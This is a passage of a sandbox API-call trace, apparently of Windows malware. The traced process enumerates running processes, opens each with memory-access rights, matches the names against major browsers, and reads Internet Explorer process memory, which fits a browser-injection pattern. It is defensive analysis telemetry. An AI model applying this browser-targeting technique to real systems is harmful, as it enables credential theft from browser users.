	[0255.476] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xaf84
	[0255.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.477] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.478] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.478] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.478] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xaf88
	[0255.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.479] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0255.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.480] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.480] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0255.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.481] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0255.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xaf8c
	[0255.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.482] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0255.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.482] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.483] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0255.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.483] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.483] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0255.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xaf90
	[0255.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.484] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0255.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.484] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.484] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0255.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.485] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.485] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0255.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xaf94
	[0255.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.486] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0255.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.486] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.486] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0255.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.487] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0255.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0255.488] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0255.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xaf98
	[0255.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.489] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0255.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.489] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.490] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0255.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.490] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.491] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0255.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xaf9c
	[0255.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.492] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0255.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.492] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.492] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0255.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.492] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0255.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xafa0
	[0255.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.494] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0255.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.494] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.494] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0255.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.495] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.495] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0255.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xafa4
	[0255.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.496] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0255.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.496] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.496] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0255.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.497] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.497] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0255.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xafa8
	[0255.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.498] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0255.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.499] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.499] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0255.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.500] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.500] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0255.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xafac
	[0255.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.501] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0255.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.501] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.502] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0255.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.502] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.502] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0255.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xafb0
	[0255.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.503] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0255.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.503] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.504] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0255.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.504] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.505] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0255.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xafb4
	[0255.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.506] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0255.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.506] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.506] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0255.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.507] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0255.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xafb8
	[0255.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.508] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0255.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.508] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.509] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0255.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.509] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.509] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0255.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xafbc
	[0255.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.510] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0255.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.510] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.510] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0255.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.511] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.511] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0255.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xafc0
	[0255.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.512] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0255.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.512] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.513] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0255.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.514] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.514] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0255.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xafc4
	[0255.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.515] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0255.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.515] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.516] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0255.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.517] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.517] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0255.518] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xafc8
	[0255.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.518] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0255.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.518] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.519] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0255.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.519] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.520] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0255.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xafcc
	[0255.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.521] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0255.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.521] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.522] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0255.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.522] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0255.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xafd0
	[0255.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.524] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0255.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.524] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.525] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0255.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.525] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xafd4
	[0255.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.526] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0255.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.527] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0255.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.527] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0255.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.527] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.528] NtQueryInformationProcess (in: ProcessHandle=0xafd4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0255.528] ReadProcessMemory (in: hProcess=0xafd4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0255.528] ReadProcessMemory (in: hProcess=0xafd4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0255.528] ReadProcessMemory (in: hProcess=0xafd4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0255.528] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0255.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xafd8
	[0255.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.530] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0255.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.530] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0255.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.530] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0255.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.530] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.531] NtQueryInformationProcess (in: ProcessHandle=0xafd8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0255.531] ReadProcessMemory (in: hProcess=0xafd8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0255.531] ReadProcessMemory (in: hProcess=0xafd8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0255.531] ReadProcessMemory (in: hProcess=0xafd8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0255.531] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
